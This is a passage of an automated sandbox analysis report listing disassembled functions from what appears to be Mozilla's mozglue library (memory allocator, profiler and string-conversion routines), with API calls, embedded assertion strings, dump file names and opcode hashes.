                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFE432
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFFE472
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 368790112-0
                                                                                                      • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                      • Instruction ID: c155907c5c059ef7e3758b0ccaa6f8606a67b87b8e92e487b77ff9b75807020f
                                                                                                      • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                      • Instruction Fuzzy Hash: 4033B272E0021ACFCB14CF98C8806EDBBF2FF49314F194269D965AB765D731A946CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E7B8), ref: 6CFAFF81
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E7B8), ref: 6CFB022D
                                                                                                      • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6CFB0240
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E768), ref: 6CFB025B
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E768), ref: 6CFB027B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 618468079-3577267516
                                                                                                      • Opcode ID: 91c3c586a6d077d1018e6a96538706d1486f76c36193640a292f6e622ffdf8b3
                                                                                                      • Instruction ID: b248fca05765604c181aff6840c1648b3b46884fc0ad01744f0ca78416afcbff
                                                                                                      • Opcode Fuzzy Hash: 91c3c586a6d077d1018e6a96538706d1486f76c36193640a292f6e622ffdf8b3
                                                                                                      • Instruction Fuzzy Hash: F6C2B0B1A057418FD714CF29C980716BBE1BF8A328F28C66DE4A99B7D5D771E801CB81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • memcpy.VCRUNTIME140(?,?,00004014), ref: 6CFFE811
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFEAA8
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CFFEBD5
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFEEF6
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFF223
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CFFF322
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6D000E03
                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?), ref: 6D000E54
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6D000EAE
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6D000ED4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 368790112-0
                                                                                                      • Opcode ID: e28bfade6fc23aa695243bf73cc04850a08e9e1b032b6b97dcbb85fef4b3669d
                                                                                                      • Instruction ID: 641888e2815521102ad40b4ffd9c79361a5eb5e18fc129c9829031f8554acacd
                                                                                                      • Opcode Fuzzy Hash: e28bfade6fc23aa695243bf73cc04850a08e9e1b032b6b97dcbb85fef4b3669d
                                                                                                      • Instruction Fuzzy Hash: 95638E71E0421A8FDB04CFA9C8906EDF7F2FF89310F298269D955AB355D730A946CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFF7770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CFD3E7D,?,?,?,6CFD3E7D,?,?), ref: 6CFF777C
                                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6CFD3F17
                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CFD3F5C
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFD3F8D
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFD3F99
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFD3FA0
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFD3FA7
                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CFD3FB4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
                                                                                                      • String ID: nvd3d9wrap.dll$nvinit.dll
                                                                                                      • API String ID: 1189858803-2380496106
                                                                                                      • Opcode ID: 2a51277c6be164a20fe4d74c5c9980bd17ae917df897ee7e56c44c1e7ebfeadd
                                                                                                      • Instruction ID: 5b3303ad407ab6d15964929c6f4d4190eab75af21a9bff3d1c518e09ebb27a73
                                                                                                      • Opcode Fuzzy Hash: 2a51277c6be164a20fe4d74c5c9980bd17ae917df897ee7e56c44c1e7ebfeadd
                                                                                                      • Instruction Fuzzy Hash: C152F471610B489FD715DF74C880AABB7E9AF85308F14492DE496CBB42DB34F90ACB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6CFBEE7A
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CFBEFB5
                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?), ref: 6CFC1695
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFC16B4
                                                                                                      • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6CFC1770
                                                                                                      • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CFC1A3E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$freemallocmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3693777188-0
                                                                                                      • Opcode ID: 683558595a2198c1ea666d9a1e9d76b543d4a920d80ae61a4521db8a8556fd86
                                                                                                      • Instruction ID: f812d6adfc94fd88b57c6dfb4fd1f6b19783d385f85aba1717959c2a23f42586
                                                                                                      • Opcode Fuzzy Hash: 683558595a2198c1ea666d9a1e9d76b543d4a920d80ae61a4521db8a8556fd86
                                                                                                      • Instruction Fuzzy Hash: ACB31875F0421A8FCB14CFA8C890ADEB7B2FF49304F2581A9D459AB745D730A986CF91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E7B8), ref: 6CFAFF81
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E7B8), ref: 6CFB022D
                                                                                                      • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6CFB0240
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E768), ref: 6CFB025B
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E768), ref: 6CFB027B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                      • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 618468079-3566792288
                                                                                                      • Opcode ID: e108c2e73d7b4f48d0109fb62332de22444937c4cc67677df701a5697825fd86
                                                                                                      • Instruction ID: b0ac3f3c40a581f7edcd41c164cd6e80c75c2ab3366521e5e0cf71b1cc45ac41
                                                                                                      • Opcode Fuzzy Hash: e108c2e73d7b4f48d0109fb62332de22444937c4cc67677df701a5697825fd86
                                                                                                      • Instruction Fuzzy Hash: 94B29C716057418FD718CF2AC990716BBE1BF89328F28C66CE86A9FB95D770E841CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
                                                                                                      • API String ID: 0-2712937348
                                                                                                      • Opcode ID: 0b0495d8772a3987ecb23ee950b0745c3502277ce9c6283b7b124f9709237cd8
                                                                                                      • Instruction ID: 109c3dc378849e937912b94c2a4fe184278bf0a92f64aa86c330a85262e423eb
                                                                                                      • Opcode Fuzzy Hash: 0b0495d8772a3987ecb23ee950b0745c3502277ce9c6283b7b124f9709237cd8
                                                                                                      • Instruction Fuzzy Hash: 2C923B71A083459FD724CF28C490B9BBBE1BFC9308F14891DE59A9B751DB30E949CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CFE2ED3
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFE2EE7
                                                                                                      • MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6CFE2F0D
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFE3214
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFE3242
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFE36BF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$AddressCode$DescribeDetailsFormat
                                                                                                      • String ID: MOZ_PROFILER_SYMBOLICATE$get $set
                                                                                                      • API String ID: 2257098003-3318126862
                                                                                                      • Opcode ID: d4c512530cdd78e190bfc796ffd0495eb59ff8d4aab11d11d4d64204aa3f736c
                                                                                                      • Instruction ID: b9d07d3cadd741111c5b311f36a2d423d9ad778fa640cbdddc0966bf1581bc04
                                                                                                      • Opcode Fuzzy Hash: d4c512530cdd78e190bfc796ffd0495eb59ff8d4aab11d11d4d64204aa3f736c
                                                                                                      • Instruction Fuzzy Hash: D4327075608381AFD324CF24C4846AFBBE2AFC9318F54881DE59987761DB31E94ACB53
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpystrlen
                                                                                                      • String ID: (pre-xul)$data$name$schema
                                                                                                      • API String ID: 3412268980-999448898
                                                                                                      • Opcode ID: 86ae1a52ca3c62c73db511e20e74738362386864434a8e27f0a8211362fa3cfa
                                                                                                      • Instruction ID: 73f80ad21b6026833888807e23e4a4c86bf5869097deb410349ea6f39dcb7f64
                                                                                                      • Opcode Fuzzy Hash: 86ae1a52ca3c62c73db511e20e74738362386864434a8e27f0a8211362fa3cfa
                                                                                                      • Instruction Fuzzy Hash: 93E17DB1A043419BD714CF68C84075BFBEABFD5314F154A2DE899A7780DBB0ED098B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD4F2
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD50B
                                                                                                        • Part of subcall function 6CF9CFE0: EnterCriticalSection.KERNEL32(6D01E784), ref: 6CF9CFF6
                                                                                                        • Part of subcall function 6CF9CFE0: LeaveCriticalSection.KERNEL32(6D01E784), ref: 6CF9D026
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD52E
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E7DC), ref: 6CFBD690
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFBD6A6
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E7DC), ref: 6CFBD712
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD751
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFBD7EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                      • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                      • API String ID: 2690322072-3894294050
                                                                                                      • Opcode ID: c6688c5a95987581c402e763dcaa147d7695c1b5e9957efe09193230a9464d27
                                                                                                      • Instruction ID: 6be51646f2be083ee14ab6d940b3ae0c7a4c6edea66f9c2cb9488da1274ea643
                                                                                                      • Opcode Fuzzy Hash: c6688c5a95987581c402e763dcaa147d7695c1b5e9957efe09193230a9464d27
                                                                                                      • Instruction Fuzzy Hash: BF91B671A047018FE718CF69C99076AB7F2FB89314F254A2ED56AD7B89D730A844CB43
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(-0000000C), ref: 6CFB5EDB
                                                                                                      • memset.VCRUNTIME140(6CFF7765,000000E5,55CCCCCC), ref: 6CFB5F27
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFB5FB2
                                                                                                      • memset.VCRUNTIME140(6CFF7765,000000E5,01C09015), ref: 6CFB61F0
                                                                                                      • VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6CFB7652
                                                                                                      Strings
                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CFB72E3
                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CFB72F8
                                                                                                      • MOZ_CRASH(), xrefs: 6CFB7BA4
                                                                                                      • MOZ_RELEASE_ASSERT(mNode), xrefs: 6CFB7BCD, 6CFB7C1F, 6CFB7C34, 6CFB80FD
                                                                                                      • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CFB730D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
                                                                                                      • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 2613674957-1127040744
                                                                                                      • Opcode ID: 4b25c9919d832111fc02a64afbf0a6497a05ab14ee98dc1f012744f68af47669
                                                                                                      • Instruction ID: dba9acce70ad0a075fdd18a1d0c7d4f2abe035b9fd0bd3b1a8d168846c94c48c
                                                                                                      • Opcode Fuzzy Hash: 4b25c9919d832111fc02a64afbf0a6497a05ab14ee98dc1f012744f68af47669
                                                                                                      • Instruction Fuzzy Hash: 82338C716057018FD308CF2AC590716FBE2BF85328F29C6ADE8699B7A5D731E841CB51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(000007D0), ref: 6CFF4EFF
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF4F2E
                                                                                                      • moz_xmalloc.MOZGLUE ref: 6CFF4F52
                                                                                                      • memset.VCRUNTIME140(00000000,00000000), ref: 6CFF4F62
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF52B2
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF52E6
                                                                                                      • Sleep.KERNEL32(00000010), ref: 6CFF5481
                                                                                                      • free.MOZGLUE(?), ref: 6CFF5498
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                      • String ID: (
                                                                                                      • API String ID: 4104871533-3887548279
                                                                                                      • Opcode ID: 3dc3a6fd6e739e64acf74944c999f06774cf415c51331f0e89684ecfb97f31f4
                                                                                                      • Instruction ID: 0a05d7904329882d84d1522f077b43e64bea9d290dbe0e874014cd4e725d18e3
                                                                                                      • Opcode Fuzzy Hash: 3dc3a6fd6e739e64acf74944c999f06774cf415c51331f0e89684ecfb97f31f4
                                                                                                      • Instruction Fuzzy Hash: 4AF1D372A18B008FC716CF39C85162BBBF9AFD6384F05872EF956A7651DB31D4428B81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CFB9EB8
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFB9F24
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CFB9F34
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFBA823
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFBA83C
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFBA849
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
                                                                                                      • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 2950001534-1351931279
                                                                                                      • Opcode ID: be66890e3ad7b4f83b641ea4a04e0c0b73c3abba174fb995990286512078b765
                                                                                                      • Instruction ID: f5d82343fd0d8bfbe23a48f05a24e6a6f7fe88c946163da6ecb322a7ac2b8e70
                                                                                                      • Opcode Fuzzy Hash: be66890e3ad7b4f83b641ea4a04e0c0b73c3abba174fb995990286512078b765
                                                                                                      • Instruction Fuzzy Hash: 9E727D72A057118FD714CF2AC940715FBE1BF89328F2AC66DE869AB791D735E841CB80
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CFE2C31
                                                                                                      • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CFE2C61
                                                                                                        • Part of subcall function 6CF94DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CF94E5A
                                                                                                        • Part of subcall function 6CF94DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CF94E97
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CFE2C82
                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CFE2E2D
                                                                                                        • Part of subcall function 6CFA81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CFA81DE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
